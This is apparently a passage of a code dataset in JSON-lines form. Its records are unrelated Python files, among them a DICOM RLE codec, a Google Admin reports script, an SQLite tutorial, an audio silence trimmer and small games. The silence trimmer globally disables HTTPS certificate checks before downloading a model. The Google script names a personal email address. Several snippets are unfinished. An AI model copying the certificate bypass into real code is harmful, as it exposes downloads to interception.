``\"bits_allocated\"``: :class:`int` - the number of bits allocated\n          to each pixel\n\n        Current decoding options are:\n\n        * ``{'byteorder': str}`` specify the byte ordering for the decoded data\n          when more than 8 bits per pixel are used, should be '<' for little\n          endian ordering (default) or '>' for big-endian ordering.\n\n    Returns\n    -------\n    numpy.ndarray\n        A 1D array of ``numpy.uint8`` containing the decoded frame data,\n        with planar configuration 1 and, by default, little-endian byte\n        ordering.\n\n    Raises\n    ------\n    ValueError\n        If the decoding failed.\n    \"\"\"\n    byteorder = kwargs.get('byteorder', '<')\n\n    columns = kwargs.get(\"columns\")\n    rows = kwargs.get(\"rows\")\n    bits_allocated = kwargs.get(\"bits_allocated\")\n    no_kwargs = None in (columns, rows, bits_allocated)\n    if ds is None and no_kwargs:\n        raise ValueError(\"Either `ds` or `**kwargs` must be used\")\n\n    # Only read from the dataset when one was actually supplied,\n    # otherwise fall back to the values passed via `kwargs`\n    if ds is not None:\n        columns = ds.get(\"Columns\", columns)\n        rows = ds.get(\"Rows\", rows)\n        bits_allocated = ds.get(\"BitsAllocated\", bits_allocated)\n\n    return np.frombuffer(\n        decode_frame(src, rows * columns, bits_allocated, byteorder),\n        dtype='uint8'\n    )\n\n\ndef encode_array(\n    arr: \"np.ndarray\", ds: Optional[\"Dataset\"] = None, **kwargs\n) -> Generator[bytes, None, None]:\n    \"\"\"Yield RLE encoded frames from `arr`.\n\n    .. 
versionadded:: 1.1\n\n    Parameters\n    ----------\n    arr : numpy.ndarray\n        The array of data to be RLE encoded, should be ordered as (frames,\n        rows, columns, planes), (rows, columns, planes), (frames, rows,\n        columns) or (rows, columns).\n    ds : pydicom.dataset.Dataset, optional\n        The dataset corresponding to `arr` with matching values for *Rows*,\n        *Columns*, *Samples per Pixel* and *Bits Allocated*. Required if\n        the array properties aren't specified using `kwargs`.\n    **kwargs\n        Required keyword parameters if `ds` isn't used are:\n\n        * ``'rows': int`` the number of rows contained in `arr`\n        * ``'columns': int`` the number of columns contained in `arr`\n        * ``'samples_per_pixel': int`` the number of samples per pixel, either\n          1 for monochrome or 3 for RGB or similar data.\n        * ``'bits_allocated': int`` the number of bits needed to contain each\n          pixel, either 8, 16, 32 or 64.\n        * ``'number_of_frames': int`` the number of frames in `arr`, required if\n          more than one frame is present.\n\n    Yields\n    ------\n    bytes\n        An RLE encoded frame from `arr`.\n    \"\"\"\n    byteorder = arr.dtype.byteorder\n    if byteorder == '=':\n        byteorder = '<' if sys.byteorder == \"little\" else '>'\n\n    kwargs['byteorder'] = byteorder\n\n    if ds:\n        kwargs['rows'] = ds.Rows\n        kwargs['columns'] = ds.Columns\n        kwargs['samples_per_pixel'] = ds.SamplesPerPixel\n        kwargs['bits_allocated'] = ds.BitsAllocated\n        kwargs['number_of_frames'] = int(getattr(ds, \"NumberOfFrames\", 1) or 1)\n\n    if kwargs.get('number_of_frames', 1) > 1:\n        for frame in arr:\n            yield encode_pixel_data(frame.tobytes(), **kwargs)\n    else:\n        yield encode_pixel_data(arr.tobytes(), **kwargs)\n\n\ndef encode_pixel_data(\n    src: bytes,\n    ds: Optional[\"Dataset\"] = None,\n    byteorder: Optional[str] = None,\n    **kwargs\n) -> bytes:\n    \"\"\"Return `src` encoded using the DICOM RLE (PackBits) algorithm.\n\n    .. versionadded:: 1.1\n\n    .. warning::\n\n        *Samples per Pixel* x (*Bits Allocated* / 8) must be less than or equal\n        to 15 in order to meet the requirements of the *RLE Lossless*\n        transfer syntax.\n\n    Parameters\n    ----------\n    src : bytes\n        The data for a single image frame to be RLE encoded.\n    ds : pydicom.dataset.Dataset, optional\n        The dataset corresponding to `src` with matching values for *Rows*,\n        *Columns*, *Samples per Pixel* and *Bits Allocated*. Required if\n        the frame properties aren't specified using `kwargs`.\n    byteorder : str, optional\n        Required if the samples per pixel is greater than 1. 
If `src` is in\n        little-endian byte order then ``'<'``, otherwise ``'>'`` for\n        big-endian.\n    **kwargs\n        If `ds` is not used then the following are required:\n\n        * ``'rows': int`` the number of rows contained in `src`\n        * ``'columns': int`` the number of columns contained in `src`\n        * ``'samples_per_pixel': int`` the number of samples per pixel, either\n          1 for monochrome or 3 for RGB or similar data.\n        * ``'bits_allocated': int`` the number of bits needed to contain each\n          pixel, either 8, 16, 32 or 64.\n\n    Returns\n    -------\n    bytes\n        The RLE encoded frame.\n    \"\"\"\n    if ds:\n        r = ds.Rows\n        c = ds.Columns\n        bpp = ds.BitsAllocated\n        spp = ds.SamplesPerPixel\n    else:\n        r = kwargs['rows']\n        c = kwargs['columns']\n        bpp = kwargs['bits_allocated']\n        spp = kwargs['samples_per_pixel']\n\n    # Validate input\n    if spp not in [1, 3]:\n        name = \"(0028,0002) 'Samples per Pixel'\" if ds else \"'samples_per_pixel'\"\n        raise ValueError(name + \" must be 1 or 3\")\n\n    if bpp not in [8, 16, 32, 64]:\n        name = \"(0028,0100) 'Bits Allocated'\" if ds else \"'bits_allocated'\"\n        raise ValueError(name + \" must be 8, 16, 32 or 64\")\n\n    if bpp / 8 * spp > 15:\n        raise ValueError(\n            \"Unable to encode the data as the RLE format used by the DICOM \"\n            \"Standard only allows a maximum of 15 segments\"\n        )\n\n    byteorder = '<' if bpp == 8 else byteorder\n    if byteorder not in ('<', '>'):\n        raise ValueError(\n            \"A valid 'byteorder' is required when the number of bits per \"\n            \"pixel is greater than 8\"\n        )\n\n    if len(src) != (r * c * bpp / 8 * spp):\n        raise ValueError(\n            \"The length of the data doesn't match the image parameters\"\n        )\n\n    return encode_frame(src, r, c, spp, bpp, byteorder)\n\n\ndef generate_frames(ds: \"Dataset\", reshape: bool = True) -> \"np.ndarray\":\n    \"\"\"Yield a *Pixel Data* frame from `ds` as an :class:`~numpy.ndarray`.\n\n    Parameters\n    ----------\n    ds : pydicom.dataset.Dataset\n        The :class:`Dataset` containing an :dcm:`Image Pixel\n        ` module and the *Pixel Data* to be\n        converted.\n    reshape : bool, optional\n        If ``True`` (default), then the returned :class:`~numpy.ndarray` will\n        be reshaped to the correct dimensions. 
If ``False`` then no reshaping\n will be performed.\n\n Yields\n -------\n numpy.ndarray\n A single frame of (7FE0,0010) *Pixel Data* as a little-endian ordered\n :class:`~numpy.ndarray` with an appropriate dtype for the data.\n\n Raises\n ------\n AttributeError\n If `ds` is missing a required element.\n NotImplementedError\n If the dataset's *Transfer Syntax UID* is not *RLE Lossless*.\n \"\"\"\n import numpy as np\n\n from pydicom.encaps import generate_pixel_data_frame\n from pydicom.pixel_data_handlers.util import pixel_dtype\n from pydicom.uid import RLELossless\n\n if ds.file_meta.TransferSyntaxUID != RLELossless:\n raise NotImplementedError(\n \"Only RLE Lossless encoded pixel data encoded is supported\"\n )\n\n # Check required elements\n required_elements = [\n \"BitsAllocated\", \"Rows\", \"Columns\", \"PixelRepresentation\",\n \"SamplesPerPixel\", \"PixelData\",\n ]\n missing = [elem for elem in required_elements if elem not in ds]\n if missing:\n raise AttributeError(\n \"Unable to convert the pixel data as the following required \"\n \"elements are missing from the dataset: \" + \", \".join(missing)\n )\n\n nr_frames = int(getattr(ds, \"NumberOfFrames\", 1) or 1)\n r = ds.Rows\n c = ds.Columns\n bpp = ds.BitsAllocated\n\n dtype = pixel_dtype(ds)\n for frame in generate_pixel_data_frame(ds.PixelData, nr_frames):\n arr = np.frombuffer(decode_frame(frame, r * c, bpp, '<'), dtype=dtype)\n\n if not reshape:\n yield arr\n continue\n\n if ds.SamplesPerPixel == 1:\n yield arr.reshape(ds.Rows, ds.Columns)\n else:\n # RLE is planar configuration 1\n arr = np.reshape(arr, (ds.SamplesPerPixel, ds.Rows, ds.Columns))\n yield arr.transpose(1, 2, 0)\n\n\ndef pixel_array(ds: \"Dataset\") -> \"np.ndarray\":\n \"\"\"Return the entire *Pixel Data* as an :class:`~numpy.ndarray`.\n\n Parameters\n ----------\n ds : pydicom.dataset.Dataset\n The :class:`Dataset` containing an :dcm:`Image Pixel\n ` module and the *RLE Lossless* encoded\n *Pixel Data* to be decoded.\n\n Returns\n -------\n numpy.ndarray\n The contents of (7FE0,0010) *Pixel Data* as a little-endian ordered\n :class:`~numpy.ndarray` with shape (rows, columns), (rows, columns,\n components), (frames, rows, columns), or (frames, rows, columns,\n components) depending on the dataset.\n \"\"\"\n from pydicom.pixel_data_handlers.util import (\n get_expected_length, reshape_pixel_array, pixel_dtype\n )\n\n expected_len = get_expected_length(ds, 'pixels')\n frame_len = expected_len // getattr(ds, \"NumberOfFrames\", 1)\n # Empty destination array for our decoded pixel data\n arr = np.empty(expected_len, pixel_dtype(ds))\n\n generate_offsets = range(0, expected_len, frame_len)\n for frame, offset in zip(generate_frames(ds, False), generate_offsets):\n arr[offset:offset + frame_len] = frame\n\n return reshape_pixel_array(ds, arr)\n\n\ndef pixel_data(arr: \"np.ndarray\", ds: \"Dataset\") -> bytes:\n \"\"\"Return `arr` as encapsulated and RLE encoded bytes.\n\n .. 
versionadded:: 1.1\n\n    Parameters\n    ----------\n    arr : numpy.ndarray\n        The :class:`~numpy.ndarray` to be encoded.\n    ds : pydicom.dataset.Dataset\n        The dataset corresponding to `arr` with matching values for *Rows*,\n        *Columns*, *Samples per Pixel* and *Bits Allocated*.\n\n    Returns\n    -------\n    bytes\n        The encapsulated and RLE encoded `arr`, ready to be used to set\n        the dataset's *Pixel Data* element.\n    \"\"\"\n    from pydicom.encaps import encapsulate\n\n    return encapsulate([ii for ii in encode_array(arr, ds)])\n","repo_name":"Abith619/Abith619","sub_path":"pydicom/.dicom/lib/python3.9/site-packages/rle/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11251,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"51"} +{"seq_id":"15219962012","text":"from google.oauth2 import service_account\nimport googleapiclient.discovery\nimport json\n\n\ncredentials = service_account.Credentials.from_service_account_file(\n    'service_account.json',\n    scopes=['https://www.googleapis.com/auth/admin.reports.audit.readonly', 'https://www.googleapis.com/auth/admin.reports.usage.readonly'],\n    subject='nikolay.vaklinov@infinitelambda.com')\n\nservice = googleapiclient.discovery.build('admin', 'reports_v1', credentials=credentials)\nresults = service.userUsageReport().get(\n    userKey='all', date='2020-08-01',\n    parameters='gmail:num_emails_received,gmail:num_emails_sent,gmail:timestamp_last_access,gmail:timestamp_last_interaction',\n    maxResults=1\n    ).execute()\n\nprint('-'*200)\nprint(json.dumps(results, indent=2))","repo_name":"petero2018/LearnPythonRepo","sub_path":"Google_APIs/service_account_reports_api_with_user_usage.py","file_name":"service_account_reports_api_with_user_usage.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"14556478895","text":"\"\"\"\nFiltering data\nConditions - exact matches, ranges, inclusion, empty values\nCombinations - logical operators\n\"\"\"\n\nimport sqlite3\n\nwith sqlite3.connect(\"netflix.db\") as connection:\n    cursor = connection.cursor()\n\n    # query = \"\"\"\n    # SELECT * - all columns\n    # FROM netflix\n    # WHERE director = 'Cristina Jacob'\n    # LIMIT 10\n    # OFFSET 10\n    # \"\"\"\n\n    # query = \"\"\"\n    # SELECT director, duration - only the listed columns\n    # FROM netflix\n    # WHERE director = 'Cristina Jacob'\n    # AND duration > 110\n    # \"\"\"\n\n    # query = \"\"\"\n    # SELECT *\n    # FROM netflix\n    # WHERE country = 'Russia' OR country = 'Romania' - too verbose to write, see the simpler example BELOW\n    # \"\"\"\n\n    # query = \"\"\"\n    # SELECT title, country\n    # FROM netflix\n    # WHERE country IN ('Russia', 'Romania') - this way is better\n    # \"\"\"\n\n    # query = \"\"\"\n    # SELECT title, country\n    # FROM netflix\n    # WHERE country LIKE 'R%' - (R% - starts with the letter R\n    # %R - ends with the letter R\n    # %R% - contains the letter R in the middle)\n    # \"\"\"\n\n    # query = \"\"\"\n    # SELECT title, country\n    # FROM netflix\n    # WHERE netflix.cast LIKE '%Maria%'\n    # or\n    # WHERE \"cast\" LIKE '%Maria%'\n    # since cast is a reserved word,\n    # you can use double quotes (the more common option)\n    # or prefix the column with the table name and a dot,\n    # as in the example above\n    # \"\"\"\n\n    # query = \"\"\"\n    # SELECT \"cast\"\n    # FROM netflix\n    # WHERE release_year > 2000\n    # \"\"\"\n\n    # query = \"\"\"\n    # SELECT release_year, title\n    # FROM netflix\n    # WHERE release_year <1950\n    # \"\"\"\n\n    # query = \"\"\"\n    # SELECT \"cast\"\n    # FROM netflix\n    # WHERE release_year < 1950 AND release_year > 1945 - too verbose to write, see the simpler example BELOW\n    # \"\"\"\n\n    # query = \"\"\"\n    # SELECT \"cast\"\n    # FROM netflix\n    # WHERE release_year BETWEEN 1945 AND 1950 - this way is better\n    # BETWEEN works as greater-or-equal and less-or-equal (the bounds of the range are inclusive)\n    # \"\"\"\n\n    # query = \"\"\"\n    # SELECT release_year, title, director\n    # FROM netflix\n    # WHERE release_year BETWEEN 1945 AND 1950\n    # AND director != '' - director is not an empty string\n    # \"\"\"\n\n    # WHERE director != '' - director is not an empty string: the row has a value, it is just empty\n    # or\n    # WHERE director IS NOT NULL - this form means the value is missing entirely (NULL),\n    # i.e. nothing was stored in the column at all\n    query = \"\"\"\n    SELECT release_year, title, director\n    FROM netflix\n    WHERE director != ''\n    \"\"\"\n\n    cursor.execute(query)\n\n    for row in cursor.fetchall():\n        print(row)","repo_name":"AnastasiaPliska/Homework__18","sub_path":"lessons/lesson_14/03-where.py","file_name":"03-where.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"30839595039","text":"#!/usr/bin/env python\nimport ssl\nfrom pathlib import Path\n\nimport click\nimport torch\nfrom torchaudio.transforms import Resample\nfrom tqdm import tqdm\n\nSILERO_SAMPLE_RATE = 16_000\n\n\ndef align_timestamps(timestamps, fraction):\n    result = []\n    for stamp_dict in timestamps:\n        result.append({\n            \"start\": round(stamp_dict[\"start\"] * fraction),\n            \"end\": round(stamp_dict[\"end\"] * fraction),\n        })\n    return result\n\n\n@click.command()\n@click.option(\"--input-dir\", type=str,\n              help=\"Directory with audios to process.\")\n@click.option(\"--output-dir\", type=str, default=\"trimmed\",\n              help=\"Directory for audios with pauses trimmed.\")\n@click.option(\"--target-sr\", type=int, default=48000,\n              help=\"Sample rate of trimmed audios.\")\n@click.option(\"--audio-ext\", type=str, default=\"flac\",\n              help=\"Extension of audio files.\")\ndef main(input_dir: str, output_dir: str, audio_ext: str, target_sr: int) -> None:\n    \"\"\"Remove silence from audios.\"\"\"\n    \n    # Disables SSL cert check for urllib which will be called\n    # in subsequent call of torch.hub.load\n    ssl._create_default_https_context = ssl._create_unverified_context\n    \n    model, utils = torch.hub.load(\n        repo_or_dir=\"snakers4/silero-vad\",\n        model=\"silero_vad\",\n        force_reload=False,\n    )\n\n    (\n        _,  # get_speech_ts\n        get_speech_ts_adaptive,\n        save_audio,\n        read_audio,\n        _,  # state_generator\n        _,  # single_audio_stream\n        collect_chunks\n    ) = utils\n\n    path = Path(input_dir)\n    processed_path = Path(output_dir)\n    processed_path.mkdir(exist_ok=True, parents=True)\n\n    resampler = Resample(\n        orig_freq=target_sr,\n        new_freq=SILERO_SAMPLE_RATE,\n        resampling_method=\"sinc_interpolation\",\n    )\n    resample_fraction = target_sr / SILERO_SAMPLE_RATE\n\n    filepath_list = list(path.rglob(f\"*.{audio_ext}\"))\n    print(f\"Number of audio files found: {len(filepath_list)}\")\n    print(\"Performing pausation cutting...\")\n\n    log_path = 
processed_path / \"pausation_cutting.log\"\n for filepath in tqdm(filepath_list):\n wave_tensor = read_audio(filepath, target_sr=target_sr)\n wave_resampled = resampler(wave_tensor)\n speech_timestamps = get_speech_ts_adaptive(wave_resampled, model)\n fixed_timestamps = align_timestamps(speech_timestamps, resample_fraction)\n speaker_dir = processed_path / filepath.parent.name\n speaker_dir.mkdir(exist_ok=True)\n try:\n save_audio(\n speaker_dir / filepath.name,\n collect_chunks(fixed_timestamps, wave_tensor),\n target_sr,\n )\n except RuntimeError:\n with open(log_path, \"a\") as fout:\n fout.write(str(filepath) + \"\\n\")\n\n print(\"Pausation cutting finished.\")\n print(f\"Trimmed files are located at {output_dir}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"IMDxD/emotts","sub_path":"src/preprocessing/pausation_cutting.py","file_name":"pausation_cutting.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"35012713015","text":"try:\n import importlib.util\nexcept Exception as e:\n print(e)\n \ndef load_tflite_model(model_path,use_TPU = False):\n # Import TensorFlow libraries\n # If tflite_runtime is installed, import interpreter from tflite_runtime, else import from regular tensorflow\n # If using Coral Edge TPU, import the load_delegate library\n pkg = importlib.util.find_spec('tflite_runtime')\n if pkg:\n from tflite_runtime.interpreter import Interpreter\n if use_TPU:\n from tflite_runtime.interpreter import load_delegate\n else:\n from tensorflow.lite.python.interpreter import Interpreter\n if use_TPU:\n from tensorflow.lite.python.interpreter import load_delegate\n # Load the Tensorflow Lite model.\n # If using Edge TPU, use special load_delegate argument\n if use_TPU:\n interpreter = Interpreter(model_path=model_path,\n experimental_delegates=[load_delegate('libedgetpu.so.1',{})])\n else:\n interpreter = Interpreter(model_path=model_path)\n print(model_path)\n interpreter.allocate_tensors()\n return interpreter","repo_name":"wupanhao/lepi-ros-server","sub_path":"catkin_ws/src/pi_ai/include/pi_ai/load_runtime.py","file_name":"load_runtime.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"32015205741","text":"from neuralnetwork import dataBase\nimport streamlit as st\nfrom neuralnetwork.main import predict, init, charts\n\ndef load_view():\n stocks = [row[0] for row in dataBase.get_Currency()]\n\n buff, col, buff2 = st.columns([1, 2, 1])\n\n form = col.form(key='crypto_select')\n ticker = form.selectbox('Выберите пару криптовалюты для предсказания', stocks)\n DAYS_TO_PREDICT = form.slider('Период предсказания: ', 1, 15)\n submit_button = form.form_submit_button(label='Рассчитать')\n\n if submit_button:\n\n init()\n total_price, daily_price, predicted_cases, train, epochs = predict(ticker, DAYS_TO_PREDICT)\n charts(ticker, total_price, daily_price, predicted_cases, train, epochs)\n\n buff, col, buff2 = st.columns([1, 2, 1])\n col.write(predicted_cases)\n\n","repo_name":"Rehby/CryptoProject","sub_path":"pages/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"5794732017","text":"from django.urls import path\n\nfrom . 
import views\n\napp_name = 'activities'\nurlpatterns = [\n path('activities/', views.activities, name='activities'),\n path('add_activity/', views.add_activity, name=\"add_activity\"),\n path('update_activity//', views.update_activity, name=\"update_activity\"),\n path('delete_activity//', views.delete_activity, name=\"delete_activity\"),\n]\n","repo_name":"howa3204/kanaboard-app","sub_path":"activities/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73132137118","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport logging\nlog = logging.getLogger(__name__)\n\n#-----------------------------------------------------------------------------\n# Imports\n#-----------------------------------------------------------------------------\n\n# Standard library imports\nimport re\n\n# External imports\n\n# Bokeh imports\n\n#-----------------------------------------------------------------------------\n# Globals and constants\n#-----------------------------------------------------------------------------\n\n__all__ = (\n 'decode_utf8',\n 'encode_utf8',\n 'escape',\n 'format_docstring',\n 'indent',\n 'nice_join',\n 'snakify',\n)\n\n#-----------------------------------------------------------------------------\n# General API\n#-----------------------------------------------------------------------------\n\ndef encode_utf8(u):\n ''' Encode a UTF-8 string to a sequence of bytes.\n\n Args:\n u (str) : the string to encode\n\n Returns:\n bytes\n\n '''\n import sys\n if sys.version_info[0] == 2:\n u = u.encode('utf-8')\n return u\n\ndef decode_utf8(u):\n ''' Decode a sequence of bytes to a UTF-8 string\n\n Args:\n u (str) : the bytes to decode\n\n Returns:\n UTF-8 string\n\n '''\n import sys\n if sys.version_info[0] == 2:\n u = u.decode('utf-8')\n return u\n\n# based on `html` stdlib module (3.2+)\ndef escape(s, quote=(\"'\", '\"')):\n ''' Perform HTML-safe escaping.\n\n Replaces special characters \"&\", \"<\" and \">\" to HTML-safe sequences, and\n optionally translates quote characters.\n\n Args:\n s (str): a string to escape\n\n quote (seq[str], optional) : which quote characters to replace\n (default: (\"'\", '\"'))\n\n Returns:\n str\n\n '''\n s = s.replace(\"&\", \"&\")\n s = s.replace(\"<\", \"<\")\n s = s.replace(\">\", \">\")\n if quote:\n if '\"' in quote:\n s = s.replace('\"', \""\")\n if \"'\" in quote:\n s = s.replace(\"'\", \"'\")\n return s\n\ndef indent(text, n=2, ch=\" \"):\n ''' Indent all the lines in a given block of text by a specified amount.\n\n Args:\n text (str) :\n The text to indent\n\n n (int, optional) :\n The amount to indent each line by (default: 2)\n\n ch (char, optional) :\n What character to fill the indentation with (default: \" \")\n\n '''\n padding = ch * n\n return \"\\n\".join(padding+line for line in text.split(\"\\n\"))\n\ndef nice_join(seq, sep=\", \", conjuction=\"or\"):\n ''' Join together sequences of strings into English-friendly phrases using\n the conjunction ``or`` when appropriate.\n\n Args:\n seq (seq[str]) : a sequence of strings to nicely join\n sep (str, optional) : a sequence delimiter to use (default: \", \")\n conjunction (str or None, optional) : a conjuction to use for the last\n two items, or None to reproduce basic join behaviour (default: \"or\")\n\n Returns:\n a joined string\n\n Examples:\n >>> nice_join([\"a\", \"b\", \"c\"])\n 'a, b or c'\n\n '''\n seq = [str(x) 
for x in seq]\n\n    if len(seq) <= 1 or conjuction is None:\n        return sep.join(seq)\n    else:\n        return \"%s %s %s\" % (sep.join(seq[:-1]), conjuction, seq[-1])\n\ndef snakify(name, sep='_'):\n    ''' Convert CamelCase to snake_case. '''\n    name = re.sub(\"([A-Z]+)([A-Z][a-z])\", r\"\\1%s\\2\" % sep, name)\n    name = re.sub(\"([a-z\\\\d])([A-Z])\", r\"\\1%s\\2\" % sep, name)\n    return name.lower()\n\ndef format_docstring(docstring, *args, **kwargs):\n    ''' Safely format docstrings.\n\n    When Python is executed with the ``-OO`` option, doc strings are removed and\n    replaced with the value ``None``. This function guards against applying the string\n    formatting options in that case.\n\n    Args:\n        docstring (str or None) : The docstring to format, or ``None``\n        args (tuple) : string formatting arguments for the docstring\n        kwargs (dict) : string formatting arguments for the docstring\n\n    Returns:\n        str or None\n\n    '''\n    return None if docstring is None else docstring.format(*args, **kwargs)\n\n#-----------------------------------------------------------------------------\n# Dev API\n#-----------------------------------------------------------------------------\n\n#-----------------------------------------------------------------------------\n# Private API\n#-----------------------------------------------------------------------------\n\n#-----------------------------------------------------------------------------\n# Code\n#-----------------------------------------------------------------------------\n","repo_name":"holzschu/Carnets","sub_path":"Library/lib/python3.7/site-packages/bokeh-1.4.0-py3.7.egg/bokeh/util/string.py","file_name":"string.py","file_ext":"py","file_size_in_byte":4652,"program_lang":"python","lang":"en","doc_type":"code","stars":510,"dataset":"github-code","pt":"51"} +{"seq_id":"34530070645","text":"from deck_of_cards.classes import Deck\n\nbicycle = Deck()\n\n# bicycle.show_cards()\n\ndef black_jack(dealer):\n    dealer=[]\n    player=[]\n    player_score= dealer[0]+ dealer[1]\n    dealer_score=0\n    print('welcome to Black Jack')\n\ndef dealer(deck):\n    sel","repo_name":"merazkevin/python_2","sub_path":"introduction/deck_of_cards/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73847537439","text":"from sys import stdin\n\ndef isLower(guess):\n\tisGuessLower = True\n\n\tfor lowGuess in lowGuesses:\n\t\tif (lowGuess >= guess):\n\t\t\tisGuessLower = False\n\t\n\treturn isGuessLower\n\ndef isHigher(guess):\n\tisGuessHigher = True\n\n\tfor highGuess in highGuesses:\n\t\tif (highGuess <= guess):\n\t\t\tisGuessHigher = False\n\t\n\treturn isGuessHigher\n\nlowGuesses = []\nhighGuesses = []\n\nwhile True:\n\tguess = int(stdin.readline())\n\tif (guess == 0):\n\t\tbreak\n\n\tresponse = str(stdin.readline()).strip()\n\n\tif response == 'too low':\n\t\tlowGuesses.append(guess)\n\telif response == 'too high':\n\t\thighGuesses.append(guess)\n\telif response == 'right on':\n\t\tif isLower(guess) and isHigher(guess):\n\t\t\tprint('Stan may be honest')\n\t\telse:\n\t\t\tprint('Stan is dishonest')\n\t\t\n\t\tlowGuesses = []\n\t\thighGuesses = []","repo_name":"iago-mendes/competitive-programming","sub_path":"guessinggame/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"33990475475","text":"# from threading import Thread,Timer,current_thread\n#\n# def task():\n#     t = 
Timer(interval=5,function=task)\n# t.start()\n# print('hello world,thread name is %s'%current_thread().getName())\n#\n# if __name__ == '__main__':\n# task()\n\nimport random,string\nfrom threading import Thread,Timer\n\nclass Input_Code():\n def refresh_code(self):\n t = Timer(interval=5,function=self.refresh_code)\n t.start()\n self.code = ''.join(random.sample(string.ascii_lowercase+string.ascii_uppercase,4))\n\n def check_code(self):\n while True:\n print(self.code)\n msg = input('>>>:')\n if msg==self.code:\n print('success')\n else:\n print('fail')\n\nif __name__ == '__main__':\n i = Input_Code()\n i.refresh_code()\n i.check_code()","repo_name":"music51555/wxPythonCode","sub_path":"m4/socket_correlation/my_review/Timer_test.py","file_name":"Timer_test.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"851464280","text":"from header import *\n\n# script_shuffle_troop_slots:\n\t\t# Shuffles a range of slots of a given troop.\n\t\t# Used for exploiting a troop as an array.\n\t\t# Input: arg1 = troop_no, arg2 = slot_begin, arg3 = slot_end\nshuffle_troop_slots\t= (\n\t\"shuffle_troop_slots\",\n\t\t\t[\n\t\t\t\t(store_script_param, \":troop_no\", 1),\n\t\t\t\t(store_script_param, \":slots_begin\", 2),\n\t\t\t\t(store_script_param, \":slots_end\", 3),\n\t\t\t\t(try_for_range, \":cur_slot_no\", \":slots_begin\", \":slots_end\"),\n\t\t\t\t\t(store_random_in_range, \":random_slot_no\", \":slots_begin\", \":slots_end\"), #reg(58) = random slot. Now exchange slots reg(57) and reg(58)\n\t\t\t\t\t(troop_get_slot, \":cur_slot_value\", \":troop_no\", \":cur_slot_no\"), #temporarily store the value in slot reg(57) in reg(59)\n\t\t\t\t\t(troop_get_slot, \":random_slot_value\", \":troop_no\", \":random_slot_no\"), #temporarily store the value in slot reg(58) in reg(60)\n\t\t\t\t\t(troop_set_slot, \":troop_no\", \":cur_slot_no\", \":random_slot_value\"), # Now exchange the two...\n\t\t\t\t\t(troop_set_slot, \":troop_no\", \":random_slot_no\", \":cur_slot_value\"),\n\t\t\t\t(try_end),\n\t\t])","repo_name":"admiralnelson/modded_modded_1257ad","sub_path":"script/procedures/array.py","file_name":"array.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"14800241391","text":"'''\nHero's world! 
beta 0.1\nMaroonlk\n2018-06-25\n'''\nimport time\nimport random\n\n\n# Set up the map\nclass GameMap(object):\n    map_size = None\n    def __init__(self, size=[4, 5]):\n        self.size = size\n        self.map = [[x, y] for x in range(0, size[0]) for y in range(0, size[1])]\n        GameMap.map_size = size\n\n    # Print the map\n    def pri_Map(self, wei_zhi=None):\n        for x, y in self.map:\n            if wei_zhi == [x, y]:\n                print(\"O\", end='')\n            else:\n                print(\"-\", end='')\n            if y == self.size[1] - 1:\n                print(\"\")\n\n\n\n# map1.pri_Map([1, 1])\n# print(\"=\" * 20)\n# map1.pri_Map([2, 2])\n\n\n# Define the player class\nclass User(object):\n    def __init__(self, name='Player01', gong_ji=5, xue_liang=100, fang_yu=0, wei_zhi=[0, 0]):\n        self.name = name\n        self._gong_ji_li = gong_ji\n        self._xue_liang = xue_liang\n        self._fang_yu = fang_yu\n        self._wei_zhi = wei_zhi\n        self.ji_neng = {\n            \"1\":self._gong_ji_li * random.choice([1,1,1,1.5])\n        }\n    # Take damage\n\n\n\n    # Move the player and keep them from moving past the edges of the map\n    def move_User(self, fang_xiang):\n        if fang_xiang == 'a' and self._wei_zhi[1] != 0:\n            self._wei_zhi[1] -= 1\n        if fang_xiang == 'd' and self._wei_zhi[1] != GameMap.map_size[1]-1:\n            self._wei_zhi[1] += 1\n        if fang_xiang == 'w' and self._wei_zhi[0] != 0:\n            self._wei_zhi[0] -= 1\n        if fang_xiang == 's' and self._wei_zhi[0] != GameMap.map_size[0]-1:\n            self._wei_zhi[0] += 1\n\n# Define the monster class\nclass GuaiWu(object):\n    def __init__(self, name, gong_ji, xue_liang, fang_yu, wei_zhi=None):\n        self.name = name\n        self.gong_ji = gong_ji\n        self.xue_liang = xue_liang\n        self.fang_yu = fang_yu\n        self.wei_zhi = wei_zhi\n        self.ji_neng = {\n            '1':self.gong_ji * random.choice((1,1,1,1.5))\n        }\n\n    def shou_Shang(self, who, value):\n        self.xue_liang -= (value - self.fang_yu/2)\n\n        if self.xue_liang > 0:\n            pass\n\n\nslm = GuaiWu(\"Slime\", gong_ji=3, xue_liang=10, fang_yu=1)\n\n\n\n\nif __name__ == '__main__':\n    print(\"Welcome to the world of Heroes of Might and Magic!\")\n\n    print(\"Starting the game... ... loading... ...\")\n    time.sleep(0.5)\n    print(\"Please enter your character name (it may be left empty)\\r\\n\")\n    name = input(\"Character name: 